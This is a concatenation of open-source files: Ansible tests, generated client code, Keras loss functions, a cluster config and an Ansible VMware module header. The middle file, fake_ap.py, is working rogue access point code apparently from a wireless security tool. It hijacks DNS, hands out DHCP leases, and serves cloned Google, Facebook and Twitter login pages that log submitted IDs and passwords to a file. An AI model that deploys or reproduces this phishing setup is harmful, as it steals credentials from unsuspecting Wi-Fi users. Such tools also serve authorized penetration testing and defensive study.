def substitute(self, mapping):
return self.template
def get_cursor_location(self, mapping):
return len(self.template)
| lgpl-3.0 |
prune998/ansible | test/units/playbook/role/test_role.py | 82 | 9044 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import collections
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import patch, MagicMock
from ansible.errors import AnsibleError, AnsibleParserError
from ansible.playbook.block import Block
from ansible.playbook.task import Task
from units.mock.loader import DictDataLoader
from units.mock.path import mock_unfrackpath_noop
from ansible.playbook.role import Role
from ansible.playbook.role.include import RoleInclude
from ansible.playbook.role import hash_params
class TestHashParams(unittest.TestCase):
def test(self):
params = {'foo': 'bar'}
res = hash_params(params)
self._assert_set(res)
self._assert_hashable(res)
def _assert_hashable(self, res):
a_dict = {}
try:
a_dict[res] = res
except TypeError as e:
self.fail('%s is not hashable: %s' % (res, e))
def _assert_set(self, res):
self.assertIsInstance(res, frozenset)
def test_dict_tuple(self):
params = {'foo': (1, 'bar',)}
res = hash_params(params)
self._assert_set(res)
def test_tuple(self):
params = (1, None, 'foo')
res = hash_params(params)
self._assert_hashable(res)
def test_tuple_dict(self):
params = ({'foo': 'bar'}, 37)
res = hash_params(params)
self._assert_hashable(res)
def test_list(self):
params = ['foo', 'bar', 1, 37, None]
res = hash_params(params)
self._assert_set(res)
self._assert_hashable(res)
def test_dict_with_list_value(self):
params = {'foo': [1, 4, 'bar']}
res = hash_params(params)
self._assert_set(res)
self._assert_hashable(res)
def test_empty_set(self):
params = set([])
res = hash_params(params)
self._assert_hashable(res)
self._assert_set(res)
def test_generator(self):
def my_generator():
for i in ['a', 1, None, {}]:
yield i
params = my_generator()
res = hash_params(params)
self._assert_hashable(res)
def test_container_but_not_iterable(self):
# This is a Container that is not iterable, which is unlikely but...
class MyContainer(collections.Container):
def __init__(self, some_thing):
self.data = []
self.data.append(some_thing)
def __contains__(self, item):
return item in self.data
def __hash__(self):
return hash(self.data)
def __len__(self):
return len(self.data)
def __call__(self):
return False
foo = MyContainer('foo bar')
params = foo
self.assertRaises(TypeError, hash_params, params)
class TestRole(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_load_role_with_tasks(self):
fake_loader = DictDataLoader({
"/etc/ansible/roles/foo_tasks/tasks/main.yml": """
- shell: echo 'hello world'
""",
})
mock_play = MagicMock()
mock_play.ROLE_CACHE = {}
i = RoleInclude.load('foo_tasks', play=mock_play, loader=fake_loader)
r = Role.load(i, play=mock_play)
self.assertEqual(str(r), 'foo_tasks')
self.assertEqual(len(r._task_blocks), 1)
assert isinstance(r._task_blocks[0], Block)
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_load_role_with_handlers(self):
fake_loader = DictDataLoader({
"/etc/ansible/roles/foo_handlers/handlers/main.yml": """
- name: test handler
shell: echo 'hello world'
""",
})
mock_play = MagicMock()
mock_play.ROLE_CACHE = {}
i = RoleInclude.load('foo_handlers', play=mock_play, loader=fake_loader)
r = Role.load(i, play=mock_play)
self.assertEqual(len(r._handler_blocks), 1)
assert isinstance(r._handler_blocks[0], Block)
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_load_role_with_vars(self):
fake_loader = DictDataLoader({
"/etc/ansible/roles/foo_vars/defaults/main.yml": """
foo: bar
""",
"/etc/ansible/roles/foo_vars/vars/main.yml": """
foo: bam
""",
})
mock_play = MagicMock()
mock_play.ROLE_CACHE = {}
i = RoleInclude.load('foo_vars', play=mock_play, loader=fake_loader)
r = Role.load(i, play=mock_play)
self.assertEqual(r._default_vars, dict(foo='bar'))
self.assertEqual(r._role_vars, dict(foo='bam'))
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_load_role_with_metadata(self):
fake_loader = DictDataLoader({
'/etc/ansible/roles/foo_metadata/meta/main.yml': """
allow_duplicates: true
dependencies:
- bar_metadata
galaxy_info:
a: 1
b: 2
c: 3
""",
'/etc/ansible/roles/bar_metadata/meta/main.yml': """
dependencies:
- baz_metadata
""",
'/etc/ansible/roles/baz_metadata/meta/main.yml': """
dependencies:
- bam_metadata
""",
'/etc/ansible/roles/bam_metadata/meta/main.yml': """
dependencies: []
""",
'/etc/ansible/roles/bad1_metadata/meta/main.yml': """
1
""",
'/etc/ansible/roles/bad2_metadata/meta/main.yml': """
foo: bar
""",
'/etc/ansible/roles/recursive1_metadata/meta/main.yml': """
dependencies: ['recursive2_metadata']
""",
'/etc/ansible/roles/recursive2_metadata/meta/main.yml': """
dependencies: ['recursive1_metadata']
""",
})
mock_play = MagicMock()
mock_play.ROLE_CACHE = {}
i = RoleInclude.load('foo_metadata', play=mock_play, loader=fake_loader)
r = Role.load(i, play=mock_play)
role_deps = r.get_direct_dependencies()
self.assertEqual(len(role_deps), 1)
self.assertEqual(type(role_deps[0]), Role)
self.assertEqual(len(role_deps[0].get_parents()), 1)
self.assertEqual(role_deps[0].get_parents()[0], r)
self.assertEqual(r._metadata.allow_duplicates, True)
self.assertEqual(r._metadata.galaxy_info, dict(a=1, b=2, c=3))
all_deps = r.get_all_dependencies()
self.assertEqual(len(all_deps), 3)
self.assertEqual(all_deps[0].get_name(), 'bam_metadata')
self.assertEqual(all_deps[1].get_name(), 'baz_metadata')
self.assertEqual(all_deps[2].get_name(), 'bar_metadata')
i = RoleInclude.load('bad1_metadata', play=mock_play, loader=fake_loader)
self.assertRaises(AnsibleParserError, Role.load, i, play=mock_play)
i = RoleInclude.load('bad2_metadata', play=mock_play, loader=fake_loader)
self.assertRaises(AnsibleParserError, Role.load, i, play=mock_play)
i = RoleInclude.load('recursive1_metadata', play=mock_play, loader=fake_loader)
self.assertRaises(AnsibleError, Role.load, i, play=mock_play)
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_load_role_complex(self):
# FIXME: add tests for the more complex uses of
# params and tags/when statements
fake_loader = DictDataLoader({
"/etc/ansible/roles/foo_complex/tasks/main.yml": """
- shell: echo 'hello world'
""",
})
mock_play = MagicMock()
mock_play.ROLE_CACHE = {}
i = RoleInclude.load(dict(role='foo_complex'), play=mock_play, loader=fake_loader)
r = Role.load(i, play=mock_play)
self.assertEqual(r.get_name(), "foo_complex")
| gpl-3.0 |
csmengwan/autorest | AutoRest/Generators/Python/Python.Tests/Expected/AcceptanceTests/BodyDateTime/autorestdatetimetestservice/models/error.py | 104 | 1285 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
from msrest.exceptions import HttpOperationError
class Error(Model):
"""Error
:param status:
:type status: int
:param message:
:type message: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'int'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(self, status=None, message=None):
self.status = status
self.message = message
class ErrorException(HttpOperationError):
"""Server responsed with exception of type: 'Error'.
:param deserialize: A deserializer
:param response: Server response to be deserialized.
"""
def __init__(self, deserialize, response, *args):
super(ErrorException, self).__init__(deserialize, response, 'Error', *args)
| mit |
NORMA-Company/Atear-Beta | module/fake_ap.py | 3 | 22127 | import os
import threading
from flask import Flask, request, render_template, redirect, url_for
import json
import re
import network
from multiprocessing import Process
import datetime
import socket
import struct
import IN
from collections import defaultdict
import time
from execute import execute
class DNSQuery:
'''
@brief
@see rfc 1035
'''
def __init__(self, data):
self.data = data
self.dominio = ''
# Copy Opcode to variable 'tipo'.
tipo = (ord(data[2]) >> 3) & 15
if tipo == 0: # Opcode 0 mean a standard query(QUERY)
'''
data[12] is Question-field.
ex) 6'google'3'com'00
'''
ini = 12
lon = ord(data[ini])
while lon != 0:
self.dominio += data[ini + 1:ini + lon + 1] + '.'
ini += lon + 1
lon = ord(data[ini])
def respuesta(self, ip):
packet = ''
if self.dominio:
packet += self.data[:2] + "\x81\x80" # Response & No error.
packet += self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' # Questions and Answers Counts.
packet += self.data[12:] # Original Domain Name Question.
packet += '\xc0\x0c' # A domain name to which this resource record pertains.
packet += '\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # type, class, ttl, data-length
packet += str.join('', map(lambda x: chr(int(x)), ip.split('.')))
return packet
class DNSServer(object):
def __init__(self, iface, address):
self.iface = iface
self.START_SIGNAL = True
self.address = address
self.connect_user = dict()
def run(self):
dns_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
dns_sock.settimeout(3) # Set timeout on socket-operations.
execute('fuser -k -n udp 53')
time.sleep(0.5)
dns_sock.bind(('', 53))
while self.START_SIGNAL:
try:
data, addr = dns_sock.recvfrom(1024)
except:
continue
packet = DNSQuery(data)
# Return own IP adress.
dns_sock.sendto(packet.respuesta(self.address), addr)
dns_sock.close()
def stop(self):
self.START_SIGNAL = False
class OutOfLeasesError(Exception):
pass
class DHCPServer:
'''
This class implements a DHCP Server, limited to PXE options.
Implemented from RFC2131, RFC2132,
https://en.wikipedia.org/wiki/Dynamic_Host_Configuration_Protocol,
and http://www.pix.net/software/pxeboot/archive/pxespec.pdf.
'''
def __init__(self, iface):
# If SO_BINDTODEVICE is present, it is possible for dhcpd to operate on Linux with more than one network interface.
# man 7 socket
if not hasattr(IN, "SO_BINDTODEVICE"):
IN.SO_BINDTODEVICE = 25
self.iface = iface
self.START_SIGNAL = True
import network
if network.get_ip_address(self.iface):
self.ip = network.get_ip_address(self.iface)
else:
self.ip = '192.168.103.1'
self.port = 67
self.elements_in_address = self.ip.split('.')
# IP pool x.x.x.100 ~ x.x.x.150
self.offer_from = '.'.join(self.elements_in_address[0:3]) + '.100'
self.offer_to = '.'.join(self.elements_in_address[0:3]) + '.150'
self.subnet_mask = '255.255.255.0'
self.router = self.ip
self.dns_server = self.ip
self.broadcast = '<broadcast>'
self.file_server = self.ip
self.file_name = '' # ??
if not self.file_name:
self.force_file_name = False
self.file_name = 'pxelinux.0'
else:
self.force_file_name = True
self.ipxe = False
self.http = False
self.mode_proxy = False
self.static_config = dict()
self.whitelist = False
self.mode_debug = False
# The value of the magic-cookie is the 4 octet dotted decimal 99.130.83.99
# (or hexadecimal number 63.82.53.63) in network byte order.
# (this is the same magic cookie as is defined in RFC 1497 [17])
# In module struct '!' mean Big-endian
# 'I' mean unsigned int
self.magic = struct.pack('!I', 0x63825363) # magic cookie.
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.setsockopt(socket.SOL_SOCKET, IN.SO_BINDTODEVICE, self.iface + '\0')
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.sock.bind(('', self.port))
# Specific key is MAC
self.leases = defaultdict(lambda: {'ip': '', 'expire': 0, 'ipxe': self.ipxe})
self.connect_user = dict()
self.connect_data = ''
def get_namespaced_static(self, path, fallback = {}):
statics = self.static_config
for child in path.split('.'):
statics = statics.get(child, {})
return statics if statics else fallback
def next_ip(self):
'''
This method returns the next unleased IP from range;
also does lease expiry by overwrite.
'''
# if we use ints, we don't have to deal with octet overflow
# or nested loops (up to 3 with 10/8); convert both to 32-bit integers
# e.g '192.168.1.1' to 3232235777
encode = lambda x: struct.unpack('!I', socket.inet_aton(x))[0]
# e.g 3232235777 to '192.168.1.1'
decode = lambda x: socket.inet_ntoa(struct.pack('!I', x))
from_host = encode(self.offer_from)
to_host = encode(self.offer_to)
# pull out already leased IPs
leased = [self.leases[i]['ip'] for i in self.leases
if self.leases[i]['expire'] > time.time()]
# convert to 32-bit int
leased = map(encode, leased)
# loop through, make sure not already leased and not in form X.Y.Z.0
for offset in xrange(to_host - from_host):
if (from_host + offset) % 256 and from_host + offset not in leased:
return decode(from_host + offset)
raise OutOfLeasesError('Ran out of IP addresses to lease!')
def tlv_encode(self, tag, value):
'''Encode a TLV option.'''
return struct.pack('BB', tag, len(value)) + value
def tlv_parse(self, raw):
'''Parse a string of TLV-encoded options.'''
ret = {}
while(raw):
[tag] = struct.unpack('B', raw[0])
if tag == 0: # padding
raw = raw[1:]
continue
if tag == 255: # end marker
break
[length] = struct.unpack('B', raw[1])
value = raw[2:2 + length]
raw = raw[2 + length:]
if tag in ret:
ret[tag].append(value)
else:
ret[tag] = [value]
return ret
def get_mac(self, mac):
'''
This method converts the MAC Address from binary to
human-readable format for logging.
'''
return ':'.join(map(lambda x: hex(x)[2:].zfill(2), struct.unpack('BBBBBB', mac))).upper()
def craft_header(self, message):
'''This method crafts the DHCP header using parts of the message.'''
xid, flags, yiaddr, giaddr, chaddr = struct.unpack('!4x4s2x2s4x4s4x4s16s', message[:44])
client_mac = chaddr[:6]
# op, htype, hlen, hops, xid
response = struct.pack('!BBBB4s', 2, 1, 6, 0, xid)
if not self.mode_proxy:
response += struct.pack('!HHI', 0, 0, 0) # secs, flags, ciaddr
else:
response += struct.pack('!HHI', 0, 0x8000, 0)
if not self.mode_proxy:
if self.leases[client_mac]['ip']: # OFFER
offer = self.leases[client_mac]['ip']
else: # ACK
offer = self.get_namespaced_static('dhcp.binding.{0}.ipaddr'.format(self.get_mac(client_mac)))
offer = offer if offer else self.next_ip()
self.leases[client_mac]['ip'] = offer
self.leases[client_mac]['expire'] = time.time() + 86400
response += socket.inet_aton(offer) # yiaddr
else:
response += socket.inet_aton('0.0.0.0')
response += socket.inet_aton(self.file_server) # siaddr
response += socket.inet_aton('0.0.0.0') # giaddr
response += chaddr # chaddr
# BOOTP legacy pad
response += chr(0) * 64 # server name
if self.mode_proxy:
response += self.file_name
response += chr(0) * (128 - len(self.file_name))
else:
response += chr(0) * 128
response += self.magic # magic section
return (client_mac, response)
def craft_options(self, opt53, client_mac):
'''
@brief This method crafts the DHCP option fields
@param opt53:
* 2 - DHCPOFFER
* 5 - DHCPACK
@see RFC2132 9.6 for details.
'''
response = self.tlv_encode(53, chr(opt53)) # message type, OFFER
response += self.tlv_encode(54, socket.inet_aton(self.ip)) # DHCP Server
if not self.mode_proxy:
subnet_mask = self.get_namespaced_static('dhcp.binding.{0}.subnet'.format(self.get_mac(client_mac)), self.subnet_mask)
response += self.tlv_encode(1, socket.inet_aton(subnet_mask)) # subnet mask
router = self.get_namespaced_static('dhcp.binding.{0}.router'.format(self.get_mac(client_mac)), self.router)
response += self.tlv_encode(3, socket.inet_aton(router)) # router
dns_server = self.get_namespaced_static('dhcp.binding.{0}.dns'.format(self.get_mac(client_mac)), [self.dns_server])
dns_server = ''.join([socket.inet_aton(i) for i in dns_server])
response += self.tlv_encode(6, dns_server)
response += self.tlv_encode(51, struct.pack('!I', 86400)) # lease time
# TFTP Server OR HTTP Server; if iPXE, need both
response += self.tlv_encode(66, self.file_server)
# file_name null terminated
if not self.ipxe or not self.leases[client_mac]['ipxe']:
# http://www.syslinux.org/wiki/index.php/PXELINUX#UEFI
if 93 in self.leases[client_mac]['options'] and not self.force_file_name:
[arch] = struct.unpack("!H", self.leases[client_mac]['options'][93][0])
if arch == 0: # BIOS/default
response += self.tlv_encode(67, 'pxelinux.0' + chr(0))
elif arch == 6: # EFI IA32
response += self.tlv_encode(67, 'syslinux.efi32' + chr(0))
elif arch == 7: # EFI BC, x86-64 (according to the above link)
response += self.tlv_encode(67, 'syslinux.efi64' + chr(0))
elif arch == 9: # EFI x86-64
response += self.tlv_encode(67, 'syslinux.efi64' + chr(0))
else:
response += self.tlv_encode(67, self.file_name + chr(0))
else:
response += self.tlv_encode(67, 'chainload.kpxe' + chr(0)) # chainload iPXE
if opt53 == 5: # ACK
self.leases[client_mac]['ipxe'] = False
if self.mode_proxy:
response += self.tlv_encode(60, 'PXEClient')
response += struct.pack('!BBBBBBB4sB', 43, 10, 6, 1, 0b1000, 10, 4, chr(0) + 'PXE', 0xff)
response += '\xff'
return response
def dhcp_offer(self, message):
'''This method responds to DHCP discovery with offer.'''
client_mac, header_response = self.craft_header(message)
options_response = self.craft_options(2, client_mac) # DHCPOFFER
response = header_response + options_response
self.sock.sendto(response, (self.broadcast, 68))
def dhcp_ack(self, message):
'''This method responds to DHCP request with acknowledge.'''
client_mac, header_response = self.craft_header(message)
options_response = self.craft_options(5, client_mac) # DHCPACK
response = header_response + options_response
self.sock.sendto(response, (self.broadcast, 68))
def validate_req(self):
return False
def run(self):
'''Main listen loop.'''
while self.START_SIGNAL:
message, address = self.sock.recvfrom(1024)
# 28 bytes of padding
# 6 bytes MAC to string.
[client_mac] = struct.unpack('!28x6s', message[:34]) # Get MAC address
self.leases[client_mac]['options'] = self.tlv_parse(message[240:])
type = ord(self.leases[client_mac]['options'][53][0]) # see RFC2131, page 10
# 1 = DHCP Discover message (DHCPDiscover).
# 2 = DHCP Offer message (DHCPOffer).
# 3 = DHCP Request message (DHCPRequest).
# 4 = DHCP Decline message (DHCPDecline).
# 5 = DHCP Acknowledgment message (DHCPAck).
# 6 = DHCP Negative Acknowledgment message (DHCPNak).
# 7 = DHCP Release message (DHCPRelease).
# 8 = DHCP Informational message (DHCPInform).
if type == 1:
try:
self.dhcp_offer(message)
self.connect_user.update({
'connected': self.leases[client_mac]['ip'],
'host_name': self.leases[client_mac]['options'][12][0],
'mac_addr': self.get_mac([client_mac][0]),
'Time': datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
})
self.connect_data = self.connect_data.replace('[', '')
self.connect_data = self.connect_data.replace(']', '')
self.connect_data = '[' + self.connect_data + str(self.connect_user) + ', ]'
with open('/tmp/connect.json', 'w+') as con_log_file:
json.dump(self.connect_data, con_log_file, ensure_ascii=False)
con_log_file.close()
except OutOfLeasesError:
pass
elif type == 3 and address[0] == '0.0.0.0' and not self.mode_proxy:
self.dhcp_ack(message)
elif type == 3 and address[0] != '0.0.0.0' and self.mode_proxy:
self.dhcp_ack(message)
def stop(self):
self.START_SIGNAL = False
class WEBServer(object):
def __init__(self, iface, address):
self.address = address
self.app = Flask(__name__,
template_folder=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'phishing/templates'),
static_folder=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'phishing/static'))
#self.sslify = SSLify(self.app)
self.iface = iface
self.logged_user = dict()
self.logged_data = ''
def run(self):
try:
os.remove('/tmp/login.json')
except OSError:
pass
try:
os.remove('/tmp/connect.json')
except OSError:
pass
self.app.add_url_rule('/', 'index', self.index)
self.app.add_url_rule('/login', 'login', self.login, methods=['POST'])
self.app.add_url_rule('/shutdown', 'stop', self.stop)
self.app.run(self.address, port=80, debug=False, threaded=True)
def index(self):
url = self.split_url(request.url)
if re.search('[a-zA-Z0-9_].google.[a-zA-Z0-9_]', url['domain']):
return render_template('google/index.html'), 200
elif re.search('[a-zA-Z0-9_].facebook.[a-zA-Z0-9_]', url['domain']):
return render_template('facebook/index.html'), 200
elif re.search('[a-zA-Z0-9_].twitter.[a-zA-Z0-9_]', url['domain']):
return render_template('twitter/index.html'), 200
else:
return render_template('google/index.html'), 200
def login(self):
self.logged_user.update({
'ip_addr': request.remote_addr,
'site': self.split_url(request.url)['domain'],
'mac_addr': network.get_remote_mac(self.iface, request.remote_addr),
'id': request.form['id'],
'pw': request.form['password'],
'Time': datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
})
self.logged_data = self.logged_data.replace('[', '')
self.logged_data = self.logged_data.replace(']', '')
self.logged_data = '[' + self.logged_data + str(self.logged_user) + ', ]'
with open('/tmp/login.json', 'w+') as log_file:
json.dump(self.logged_data, log_file, ensure_ascii=False)
log_file.close()
return redirect(url_for('index'))
@staticmethod
def split_url(url):
url = url.split('/', 3)
return {'domain': url[2], 'path': url[3]}
def shutdown_server(self):
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
def stop(self):
self.shutdown_server()
return 'Server Shutdown'
class APCreate(object):
def __init__(self, iface, enc, ssid, password):
self.wlan = iface
self.ppp = 'eth0'
self.enc = str(enc).upper()
import network
# Get my IP address and create thread for DHCPServer, DNSServer, WEBServer.
if network.get_ip_address(self.wlan):
self.address = network.get_ip_address(self.wlan)
else:
# If self.address is missing then Set static IP address.
self.address = '192.168.103.1'
self.netmask = '255.255.255.0'
self.ssid = ssid
self.password = password
self.dhcp = DHCPServer(self.wlan)
self.dhcp_thread = threading.Thread(target=self.dhcp.run)
self.dns_server = DNSServer(self.wlan, self.address)
self.dns_thread = threading.Thread(target=self.dns_server.run)
self.web_server = WEBServer(self.wlan, self.address)
self.web_process = Process(target=self.web_server.run)
self.isRunning = False
def config(self):
''' Make config file for hostapd. '''
conf_file = os.path.join(os.path.dirname(os.path.abspath(__file__))) + '/conf/run.conf'
conf = open(conf_file, 'w')
data = 'interface=' + self.wlan + '\n' + \
'driver=nl80211\n' + \
'ssid=' + self.ssid + '\n' + \
'channel=11\n'
if self.enc == 'WPA':
# When encryption mode is WPA, add WPA specific data.
enc = 'auth_algs=1\nignore_broadcast_ssid=0\nwpa=3\n' + \
'wpa_passphrase=' + self.password + '\n' + \
"wpa_key_mgmt=WPA-PSK\nwpa_pairwise=TKIP\nrsn_pairwise=CCMP"
data += enc
elif self.enc == 'WEP':
# When encryption mode is WEP, add WEP specific data.
enc = 'auth_algs=3\nwep_default_key=0\n' + \
'wep_key0=' + self.password
data += enc
conf.write(data)
conf.close()
def run(self):
self.config()
# Clean
self.stop()
execute('rfkill unblock wlan')
time.sleep(1)
if_up_cmd = 'ifconfig ' + self.wlan + ' up ' + self.address + ' netmask ' + self.netmask
execute(if_up_cmd)
time.sleep(1)
execute('killall hostapd')
# Set IP table rules as packet-forwardable.
execute('sysctl -w net.ipv4.ip_forward=1')
execute('iptables -X')
execute('iptables -F')
execute('iptables -t nat -F')
execute('iptables -t nat -X')
execute('iptables -t nat -A POSTROUTING -o ' + self.ppp + ' -j MASQUERADE')
execute('iptables -A OUTPUT --out-interface ' + self.wlan + ' -j ACCEPT')
execute('iptables -A INPUT --in-interface ' + self.wlan + ' -j ACCEPT')
# Run hostapd. Hostapd daemon supports make PC to AP.
execute('hostapd -B ' + os.path.join(os.path.dirname(os.path.abspath(__file__))) + '/conf/run.conf')
time.sleep(2)
self.dns_thread.start()
self.dhcp_thread.start()
time.sleep(2)
self.web_process.start()
self.isRunning = True
def stop(self):
print "[*] FAKE_AP RECEIVED STOP SIGNAL"
if self.isRunning:
try:
self.dhcp.stop()
self.dns_server.stop()
self.web_process.terminate()
except:
pass
execute('iptables -P FORWARD DROP')
if self.wlan:
execute('iptables -D OUTPUT --out-interface ' + self.wlan + ' -j ACCEPT')
execute('iptables -D INPUT --in-interface ' + self.wlan + ' -j ACCEPT')
execute('iptables --table nat --delete-chain')
execute('iptables --table nat -F')
execute('iptables --table nat -X')
execute('sysctl -w net.ipv4.ip_forward=0')
execute('killall hostapd') # Consider using it's pid.
execute('ifconfig ' + self.wlan + ' down')
self.isRunning = False
@staticmethod
def get_values_login():
'''
Returns the collected user login information.
'''
try:
get_values = json.dumps(open('/tmp/login.json', 'r').read())
return get_values
except IOError:
return json.dumps([{}])
@staticmethod
def get_values_connect():
'''
Returns the collected device information.
'''
try:
get_values = json.dumps(open('/tmp/connect.json', 'r').read())
return get_values
except IOError:
return json.dumps([{}])
| apache-2.0 |
yhalk/vw_challenge_ECR | src/jetson/keras_frcnn/losses.py | 6 | 2089 | from keras import backend as K
from keras.objectives import categorical_crossentropy
if K.image_dim_ordering() == 'tf':
import tensorflow as tf
lambda_rpn_regr = 1.0
lambda_rpn_class = 1.0
lambda_cls_regr = 1.0
lambda_cls_class = 1.0
epsilon = 1e-4
def rpn_loss_regr(num_anchors):
def rpn_loss_regr_fixed_num(y_true, y_pred):
if K.image_dim_ordering() == 'th':
x = y_true[:, 4 * num_anchors:, :, :] - y_pred
x_abs = K.abs(x)
x_bool = K.less_equal(x_abs, 1.0)
return lambda_rpn_regr * K.sum(
y_true[:, :4 * num_anchors, :, :] * (x_bool * (0.5 * x * x) + (1 - x_bool) * (x_abs - 0.5))) / K.sum(epsilon + y_true[:, :4 * num_anchors, :, :])
else:
x = y_true[:, :, :, 4 * num_anchors:] - y_pred
x_abs = K.abs(x)
x_bool = K.cast(K.less_equal(x_abs, 1.0), tf.float32)
return lambda_rpn_regr * K.sum(
y_true[:, :, :, :4 * num_anchors] * (x_bool * (0.5 * x * x) + (1 - x_bool) * (x_abs - 0.5))) / K.sum(epsilon + y_true[:, :, :, :4 * num_anchors])
return rpn_loss_regr_fixed_num
def rpn_loss_cls(num_anchors):
def rpn_loss_cls_fixed_num(y_true, y_pred):
if K.image_dim_ordering() == 'tf':
return lambda_rpn_class * K.sum(y_true[:, :, :, :num_anchors] * K.binary_crossentropy(y_pred[:, :, :, :], y_true[:, :, :, num_anchors:])) / K.sum(epsilon + y_true[:, :, :, :num_anchors])
else:
return lambda_rpn_class * K.sum(y_true[:, :num_anchors, :, :] * K.binary_crossentropy(y_pred[:, :, :, :], y_true[:, num_anchors:, :, :])) / K.sum(epsilon + y_true[:, :num_anchors, :, :])
return rpn_loss_cls_fixed_num
def class_loss_regr(num_classes):
def class_loss_regr_fixed_num(y_true, y_pred):
x = y_true[:, :, 4*num_classes:] - y_pred
x_abs = K.abs(x)
x_bool = K.cast(K.less_equal(x_abs, 1.0), 'float32')
return lambda_cls_regr * K.sum(y_true[:, :, :4*num_classes] * (x_bool * (0.5 * x * x) + (1 - x_bool) * (x_abs - 0.5))) / K.sum(epsilon + y_true[:, :, :4*num_classes])
return class_loss_regr_fixed_num
def class_loss_cls(y_true, y_pred):
return lambda_cls_class * K.mean(categorical_crossentropy(y_true[0, :, :], y_pred[0, :, :]))
| apache-2.0 |
comeonfox/Paddle | paddle/scripts/cluster_train/conf.py | 1 | 1120 | # Copyright (c) 2016 Baidu, Inc. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
HOSTS = [
"root@192.168.100.17",
"root@192.168.100.18",
]
'''
workspace configuration
'''
#root dir for workspace, can be set as any director with real user account
ROOT_DIR = "/home/paddle"
'''
network configuration
'''
#pserver nics
PADDLE_NIC = "eth0"
#pserver port
PADDLE_PORT = 7164
#pserver ports num
PADDLE_PORTS_NUM = 2
#pserver sparse ports num
PADDLE_PORTS_NUM_FOR_SPARSE = 2
#environments setting for all processes in cluster job
LD_LIBRARY_PATH="/usr/local/cuda/lib64:/usr/lib64"
| apache-2.0 |
t794104/ansible | lib/ansible/modules/cloud/vmware/vmware_guest_snapshot.py | 13 | 17807 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Ansible Project
# This module is also sponsored by E.T.A.I. (www.etai.fr)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: vmware_guest_snapshot
short_description: Manages virtual machines snapshots in vCenter
description:
- This module can be used to create, delete and update snapshot(s) of the given virtual machine.
- All parameters and VMware object names are case sensitive.
version_added: 2.3
author:
- Loic Blot (@nerzhul) <loic.blot@unix-experience.fr>
notes:
- Tested on vSphere 5.5, 6.0 and 6.5
requirements:
- "python >= 2.6"
- PyVmomi
options:
state:
description:
- Manage snapshot(s) attached to a specific virtual machine.
- If set to C(present) and snapshot absent, then will create a new snapshot with the given name.
- If set to C(present) and snapshot present, then no changes are made.
- If set to C(absent) and snapshot present, then snapshot with the given name is removed.
- If set to C(absent) and snapshot absent, then no changes are made.
- If set to C(revert) and snapshot present, then virtual machine state is reverted to the given snapshot.
- If set to C(revert) and snapshot absent, then no changes are made.
- If set to C(remove_all) and snapshot(s) present, then all snapshot(s) will be removed.
- If set to C(remove_all) and snapshot(s) absent, then no changes are made.
required: True
choices: ['present', 'absent', 'revert', 'remove_all']
default: 'present'
name:
description:
- Name of the virtual machine to work with.
- This is required parameter, if C(uuid) is not supplied.
name_match:
description:
- If multiple VMs matching the name, use the first or last found.
default: 'first'
choices: ['first', 'last']
uuid:
description:
- UUID of the instance to manage if known, this is VMware's BIOS UUID by default.
- This is required if C(name) parameter is not supplied.
use_instance_uuid:
description:
- Whether to use the VMWare instance UUID rather than the BIOS UUID.
default: no
type: bool
version_added: '2.8'
folder:
description:
- Destination folder, absolute or relative path to find an existing guest.
- This is required parameter, if C(name) is supplied.
- The folder should include the datacenter. ESX's datacenter is ha-datacenter.
- 'Examples:'
- ' folder: /ha-datacenter/vm'
- ' folder: ha-datacenter/vm'
- ' folder: /datacenter1/vm'
- ' folder: datacenter1/vm'
